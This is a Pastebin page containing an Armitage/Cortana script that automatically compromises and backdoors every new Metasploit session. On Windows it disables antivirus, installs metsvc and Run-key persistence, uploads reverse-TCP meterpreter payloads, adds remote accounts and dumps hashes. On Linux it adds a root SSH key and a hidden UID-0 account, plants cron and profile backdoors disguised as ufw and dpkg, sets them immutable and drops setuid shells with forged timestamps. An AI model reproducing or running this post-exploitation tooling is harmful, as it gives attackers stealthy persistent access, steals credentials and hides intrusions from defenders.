Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Script to install/hide a few shells/accounts
- # To Do
- # Add dns server
- # Update hosts file with fake entries to break patching (evil grade?)
- # Author: __int128
- global('%infected');
- $win_user = 'lls_USER';
- $win_pass = '@pplesauc3';
- $local_ip = lhost();
- on session_open {
- $rhost = session_host($1);
- if (%infected[session_host($1)] != "1") {
- if (host_os(session_host($1)) eq "Microsoft Windows") {
- if(-isshell $1) {
- cmd_async("sessions -u $1");
- }
- if(-iswinmeterpreter $1) {
- say("Infecting " . session_host($1));
- m_cmd($1, "getsystem");
- m_cmd($1, "run killav");
- m_cmd($1, "run metsvc");
- handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
- $r_lport = random_port();
- # Generate Payload(s)
- $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
- $win_backdoor = generate("windows/meterpreter/reverse_tcp_allports", lhost(), $r_lport, %(), "exe");
- $handle = openf(">/tmp/$r_backdoor");
- writeb($handle, $win_backdoor);
- closef($handle);
- handler("windows/meterpreter/reverse_tcp_allports", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
- $r_lport = random_port();
- $win2_backdoor = generate("windows/meterpreter/reverse_tcp_allports", lhost(), $r_lport, %(), "dll");
- $handle = openf(">/tmp/linkinfo.dll");
- writeb($handle, $win2_backdoor);
- closef($handle);
- handler("windows/meterpreter/reverse_tcp_allports", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
- m_cd($1, 'c:\Windows\System32');
- m_upload($1, "/tmp/$r_backdoor)");
- m_cd($1, 'c:\Windows');
- m_upload($1, "/tmp/linkinfo.dll");
- m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\update.exe\"");
- $r_lport = random_port();
- m_cmd($1, "run persistence -X -i 60 -p $r_lport -r $local_ip");
- handler("windows/meterpreter/reverse_tcp", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
- m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
- m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
- $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";
- cmd_async($rdp);
- $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";
- cmd_async($tel);
- %infected[session_host($1)] = "1";
- m_cmd($1, "run hashdump");
- }
- }
- else if (host_os(session_host($1)) eq "Linux") {
- if (-isshell $1) {
- say("Infecting " . session_host($1));
- s_cmd($1, "mkdir /root/.ssh");
- # on load prompt for keys or generate?
- $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
- $pub_key = readln($handle);
- s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
- closef($handle);
- s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
- s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
- $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
- cmd_async($ssh);
- # Generate Payload
- $r_lport = random_port();
- $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
- $backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
- $handle2 = openf(">/tmp/$r_backdoor");
- writeb($handle2, $backdoor);
- closef($handle2);
- # set cron job
- s_cmd($1, "mkdir /etc/cron.5min");
- s_cmd($1, "echo '*/5 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
- s_cmd($1, "echo '*/5 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
- s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
- shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
- s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")
- s_cmd($1, "chattr +i /etc/cron.5min/dpkg");
- # set profile
- shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
- s_cmd($1, "chmod 775 /usr/bin/ufw");
- s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
- s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
- s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");
- # Create Backup Shell
- s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
- s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");
- %infected[session_host($1)] = "1";
- # Launch our aux shells
- handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
- auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
- login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
- # Get hashes
- launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
- db_sync();
- }
- }
- else {
- say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));
- }
- }
- }
- popup host_bottom {
- $rhost = $1;
- if (%infected[$1] == "1") {
- item "Re-establish connection" {
- if (host_os($1) eq "Microsoft Windows") {
- handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
- }
- if (host_os($1) eq "Linux") {
- foreach $entry (credentials()) {
- %cred = $entry;
- if(%cred["ptype"] iswm "*password*") {
- login("scanner/ssh/ssh_login", $rhost, %cred["user"], %cred["pass"], %(LHOST => lhost(), LPORT => random_port()));
- }
- }
- }
- }
- }
- }
Add Comment
Please, Sign In to add comment